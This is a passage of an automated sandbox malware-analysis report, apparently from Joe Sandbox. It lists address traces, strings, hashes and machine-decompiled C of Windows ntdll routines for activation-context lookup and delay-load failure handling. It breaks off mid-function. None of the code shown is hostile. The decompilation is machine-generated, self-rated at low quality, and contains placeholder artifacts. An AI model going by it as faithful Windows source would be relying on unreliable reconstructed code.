0x328aa4ca
0x328aa4cc
0x00000000
0x328aa4d2
0x328aa4d2
0x328aa4d2
0x328aa4d7
0x328aa28c
0x328aa28e
0x328f7833
0x328f7838
0x328f7838
0x00000000
0x328aa294
0x328aa2a5
0x328aa2ac
0x328aa3d2
0x328aa3d9
0x00000000
0x328aa3e8
0x328aa3e8
0x328aa3ec
0x328aa3f0
0x00000000
0x328aa3f0
0x328aa2b2
0x328aa2b2
0x328aa2d2
0x328aa2d6
0x328aa2d8
0x328aa2da
0x328aa2dc
0x328aa2de
0x328f783a
0x328f783c
0x00000000
0x328f7842
0x00000000
0x328f7842
0x328aa2e4
0x328aa2e4
0x328aa2e4
0x328aa2eb
0x328f78ed
0x328f78ed
0x00000000
0x328aa2f1
0x328aa2f1
0x328aa300
0x328aa300
0x328aa300
0x328aa30a
0x00000000
0x00000000
0x328aa310
0x328aa325
0x328aa32c
0x328aa4f7
0x328aa500
0x328aa502
0x328aa505
0x328aa50b
0x328aa5a5
0x328aa5b8
0x328aa5be
0x328aa5c2
0x328aa5cb
0x328aa5d1
0x328aa5d1
0x328aa5cb
0x328aa50b
0x328aa523
0x328aa549
0x328aa551
0x328aa525
0x328aa53c
0x328aa543
0x00000000
0x00000000
0x00000000
0x00000000
0x328aa543
0x328aa332
0x328aa337
0x328aa393
0x328aa399
0x328aa339
0x328aa339
0x328aa342
0x328aa344
0x328aa34a
0x328aa34e
0x328aa355
0x328aa359
0x00000000
0x328aa360
0x328aa363
0x328aa3fa
0x328aa3fc
0x328f7847
0x328f784f
0x00000000
0x328f7855
0x328f7855
0x328f7859
0x00000000
0x328f785f
0x328f785f
0x328f7862
0x328f7868
0x328f7892
0x328f7894
0x00000000
0x00000000
0x00000000
0x00000000
0x328f786a
0x328f786d
0x328f787e
0x328f788b
0x00000000
0x328f7880
0x328f7880
0x328f7885
0x328f789a
0x328f789a
0x328f789f
0x00000000
0x328f789f
0x328f786f
0x328f7873
0x328f788e
0x328f788e
0x00000000
0x328f788e
0x328f786d
0x328f7868
0x328f7859
0x328aa402
0x328aa402
0x328aa405
0x328aa554
0x328aa556
0x328aa55e
0x328aa564
0x328aa56a
0x00000000
0x328aa570
0x328aa570
0x328aa575
0x00000000
0x328aa575
0x328aa40b
0x328aa40e
0x00000000
0x328aa414
0x328aa414
0x328aa418
0x328aa420
0x328aa426
0x328aa42c
0x00000000
0x328aa432
0x328aa432
0x328aa437
0x00000000
0x328aa437
0x328aa42c
0x328aa40e
0x328aa405
0x328aa369
0x328aa369
0x328aa36c
0x328f78e3
0x00000000
0x328aa372
0x328aa372
0x328aa374
0x328aa452
0x328aa459
0x328aa57e
0x328aa585
0x00000000
0x328aa594
0x328aa594
0x328aa598
0x00000000
0x328aa598
0x328aa45f
0x328aa45f
0x328aa47f
0x328aa483
0x328aa485
0x328aa487
0x328aa489
0x328aa48b
0x00000000
0x328aa491
0x328aa493
0x328f78a8
0x328f78b1
0x328f78c3
0x328f78c3
0x328f78cb
0x00000000
0x00000000
0x328f78d6
0x328f78dc
0x00000000
0x328f78de
0x00000000
0x328f78de
0x00000000
0x328f78dc
0x328f78c3
0x328f78b1
0x328aa499
0x328aa499
0x00000000
0x328aa499
0x328aa48b
0x328aa37a
0x328aa37a
0x328aa37f
0x328aa381
0x328aa49b
0x328aa49b
0x328aa4a2
0x00000000
0x328aa4a8
0x00000000
0x328aa4a8
0x328aa387
0x328aa387
0x328aa38c
0x328aa38e
0x328aa38e
0x00000000
0x328aa38c
0x328aa381
0x328aa374
0x328aa36c
0x00000000
0x328aa363
0x328aa360
0x328aa337
0x00000000
0x328aa32c
0x328f78f1
0x328f78f1
0x328f78fc
0x328f7904
0x00000000
0x328f7904
0x328aa2eb
0x328aa2de
0x328aa2ac
0x328aa28e
0x328aa4cc
0x00000000
0x00000000
0x00000000
0x328aa269
0x00000000
0x328aa39c
0x328aa39c
0x328aa39f
0x00000000
0x328aa3a5
0x328aa3a8
0x00000000
0x00000000
0x00000000
0x00000000
0x328aa3a8
0x00000000
0x328aa39f
0x328aa250
0x328aa1e8
0x328aa1f1
0x328f77d8
0x328f77dd
0x328f77e2
0x328f77e7
0x328f77e7
0x328f77e9
0x328f77eb
0x00000000
0x328aa1f7
0x328aa1f7
0x00000000
0x328aa1f7
0x328aa1f1
0x328aa1e6
0x328aa1dd
0x328aa1d4
0x328aa1cc
0x328aa1c0
0x328aa1b1
0x00000000

Strings

RtlpFindActivationContextSection_CheckParameters, xrefs: 328F77DD, 328F7802
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328F7807
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328F77E2
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 328F78F3
Actx , xrefs: 328F7819, 328F7880
SsHd, xrefs: 328AA304

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: c15fe3d2417eed3dd04185b6e1cf84b4454199b3cbc76e78717e635d0dab6f28
Instruction ID: 27d8f03811958f71060dd55b92d6c3e55eb3a84810466dd785020dd90af78083
Opcode Fuzzy Hash: c15fe3d2417eed3dd04185b6e1cf84b4454199b3cbc76e78717e635d0dab6f28
Instruction Fuzzy Hash: ACE1E17C6043829FE715CE64C8A07AA77F1BB84358F544A2DF969CBA90DF32D845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 328AD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E328AD690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x3298b370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return E328D4B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							L3291EF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E328AD580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							L3291EF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E328AA600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E328E8050(_t214, _v84, ?str?) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E328E8050(_t174, _v84, ?str?) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x329891e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E32894428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E328D8170( &_v36, _t228 + _t254, _t211, "true", E3288B600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}

0x328ad698
0x328ad6a2
0x328ad6a6
0x328ad6ad
0x328ad6b1
0x328ad6b4
0x328ad6b8
0x328ad6c3
0x328ad6c7
0x328ad6cb
0x328ad90e
0x00000000
0x328f913f
0x328f913f
0x328ad847
0x328ad84b
0x328ad84c
0x328ad84d
0x328ad858
0x328ad858
0x328ad90e
0x328ad6d1
0x328ad6d1
0x328ad6db
0x328f9164
0x328f9164
0x00000000
0x328f9164
0x328ad6e1
0x328ad6ea
0x00000000
0x00000000
0x328ad6f3
0x328ad8fc
0x328ad701
0x328ad704
0x00000000
0x00000000
0x328ad70a
0x328ad70d
0x328ad922
0x00000000
0x00000000
0x328f9149
0x328f914e
0x328f9153
0x328f9158
0x328f9158
0x328f915a
0x328f915c
0x328f9161
0x00000000
0x328f9161
0x328ad713
0x328ad716
0x328ad936
0x00000000
0x00000000
0x328f916e
0x328f9173
0x328f9178
0x00000000
0x328f9178
0x328ad71c
0x328ad71f
0x328ad723
0x328ad72f
0x328ad73c
0x328ad745
0x328ad749
0x328ad751
0x328ad759
0x328ad768
0x00000000
0x00000000
0x328ad76e
0x328ad772
0x00000000
0x00000000
0x328ad778
0x328ad77f
0x328ad8f1
0x328ad8f1
0x328f9370
0x328f9370
0x328f937b
0x328f9380
0x328f9383
0x00000000
0x328f9383
0x328ad785
0x328ad790
0x328ad790
0x328ad790
0x328ad79a
0x00000000
0x00000000
0x328ad7a0
0x328ad7a3
0x328ad7a7
0x328ad80d
0x328ad80d
0x328ad816
0x328ad81c
0x328ad820
0x328ad822
0x328ad826
0x328ad829
0x00000000
0x328ad830
0x328ad833
0x328ad85d
0x328ad860
0x328f92e0
0x328f92e8
0x328ad941
0x328ad941
0x328ad949
0x328ad94f
0x328ad874
0x328ad874
0x328ad87a
0x328ad884
0x00000000
0x00000000
0x328ad886
0x328ad88b
0x328ad83e
0x328ad840
0x328ad891
0x328ad8a5
0x328ad8ac
0x328f933a
0x328ad8dc
0x328ad8de
0x328f935b
0x00000000
0x00000000
0x00000000
0x328f9361
0x328ad8e4
0x328ad8eb
0x00000000
0x00000000
0x00000000
0x328f9349
0x328f9349
0x328f934d
0x00000000
0x328f934d
0x328f933a
0x328ad8b2
0x328ad8d2
0x328ad8d6
0x328ad8d8
0x328ad8da
0x00000000
0x328ad8da
0x328ad842
0x328ad842
0x00000000
0x328ad842
0x328ad955
0x328ad95a
0x00000000
0x328ad95a
0x328f92ee
0x328f92f2
0x00000000
0x00000000
0x328f92f8
0x328f92fb
0x328f9301
0x328f931f
0x328f9321
0x00000000
0x00000000
0x328f9327
0x328f9327
0x328f932c
0x00000000
0x328f932c
0x328f9306
0x328f9313
0x328f931c
0x00000000
0x328f931c
0x328f9315
0x00000000
0x328f9315
0x328f9308
0x00000000
0x328f9308
0x328ad866
0x328ad869
0x00000000
0x00000000
0x328ad872
0x00000000
0x00000000
0x00000000
0x328ad872
0x328ad835
0x328ad838
0x328f9366
0x00000000
0x328f9366
0x00000000
0x328ad838
0x328ad830
0x328ad7ad
0x328f917f
0x328f917f
0x328ad7b3
0x328ad7b8
0x328f9188
0x00000000
0x00000000
0x328f9194
0x328f91a5
0x328f91ac
0x328f91ae
0x328f91b0
0x328f91b7
0x00000000
0x00000000
0x00000000
0x00000000
0x328f91bd
0x328f91bd
0x328f91c8
0x328f91ca
0x328f91d7
0x00000000
0x00000000
0x328f91e5
0x328f91e6
0x328f91ec
0x328f91f0
0x00000000
0x00000000
0x00000000
0x328f91f2
0x328ad7be
0x328ad7be
0x328ad7c2
0x328ad7c5
0x328f91f7
0x328f91fa
0x328f91fe
0x328f9213
0x328f9216
0x328f921a
0x328f921d
0x00000000
0x00000000
0x00000000
0x328f921f
0x328f9224
0x328ad805
0x328ad807
0x328f9231
0x00000000
0x00000000
0x328f9237
0x328f923d
0x328f9244
0x328f924e
0x328f9254
0x328f925c
0x328f9261
0x328f9261
0x328f925c
0x328f926d
0x328f926f
0x328f9274
0x328f9286
0x328f9299
0x328f929f
0x328f92a1
0x328f92aa
0x328f92ae
0x328f92b0
0x328f92b0
0x328f92ae
0x328f9274
0x328f92b6
0x328f92d9
0x328f92d9
0x00000000
0x328f92b6
0x00000000
0x328ad807
0x328ad7cb
0x328ad7d9
0x328ad7e0
0x328ad7e7
0x328ad7ee
0x328ad7fb
0x328ad800
0x328ad803
0x328ad803
0x00000000
0x328ad7b8
0x00000000
0x328ad790
0x00000000
0x328ad902
0x328ad6fb
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 328F9299

Strings

RtlpFindActivationContextSection_CheckParameters, xrefs: 328F914E, 328F9173
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 328F9372
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328F9178
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328F9153
Actx , xrefs: 328F9315
GsHd, xrefs: 328AD794

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: b52a03bf59d12f42eebe82d81af9c910f75184360ec81d14dba86731a40b8df4
Instruction ID: e1ffef3421fbba5c7e8fcfcc51359b5dcc9e516e69d8ba36f5bca18656c80573
Opcode Fuzzy Hash: b52a03bf59d12f42eebe82d81af9c910f75184360ec81d14dba86731a40b8df4
Instruction Fuzzy Hash: AFE1B0BC6083459FE704CF14C890B5AB7E4BF8875CF444A2DE999CB281DB71E885CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3290FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E3290FA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E3290F899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x329837c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E3290E692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x329837c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x3298391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x329891e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = L328C6010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x329891e0("true",  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

0x3290fa10
0x3290fa12
0x3290fa18
0x3290fa1d
0x3290fa2b
0x3290fa30
0x3290fa35
0x3290fa3a
0x3290fa3c
0x3290fa40
0x3290fa42
0x3290fa42
0x3290fa47
0x3290fa50
0x3290fa51
0x3290fa54
0x3290fa6d
0x3290fa72
0x3290fa77
0x3290fa7c
0x3290fa7e
0x3290fa7e
0x3290fa81
0x3290fa99
0x00000000
0x3290fa83
0x3290fa8a
0x3290fa8d
0x3290fa9b
0x3290fa9b
0x00000000
0x3290fa95
0x3290fa95
0x3290fa9d
0x3290fa9d
0x3290faa2
0x3290fb01
0x3290fb01
0x3290fb06
0x3290fb0a
0x3290fb0c
0x3290fb0c
0x3290fb15
0x3290fb1d
0x3290fb1d
0x00000000
0x3290faa8
0x3290faae
0x3290fab4
0x3290faba
0x3290fabd
0x3290fac4
0x3290fac7
0x3290facf
0x3290fad4
0x3290fae5
0x3290fae8
0x3290fad6
0x3290fad6
0x3290fadd
0x3290fadd
0x3290faf3
0x3290fafb
0x3290faff
0x3290fb21
0x3290fb25
0x00000000
0x00000000
0x00000000
0x3290faff
0x3290faa2
0x3290fa8d

APIs

RtlDebugPrintTimes.NTDLL ref: 3290FAF3
RtlDebugPrintTimes.NTDLL ref: 3290FB15

Strings

Unknown, xrefs: 3290FA42, 3290FA54
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 3290FA58
LdrpRedirectDelayloadFailure, xrefs: 3290FA5E
minkernel\ntdll\ldrdload.c, xrefs: 3290FA68
$, xrefs: 3290FABD

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 600147158d1db2533956cac696a17e94d589d33dd03d2d4ee640d019001d00e2
Instruction ID: ce02d5ab67bf80f3670ffb03850316a47cbd950f65f4d3e25a2efd9ad16fc935
Opcode Fuzzy Hash: 600147158d1db2533956cac696a17e94d589d33dd03d2d4ee640d019001d00e2
Instruction Fuzzy Hash: A9414BB9A0520DABDB01CF99C980AEEBBB9BF48754F148069ED04A7350DB719A41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 3293F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E3293F8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push("true");
				_push(0x3296d2f8);
				E328E7BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E32887662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E3293FBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E3289FED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E32940835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
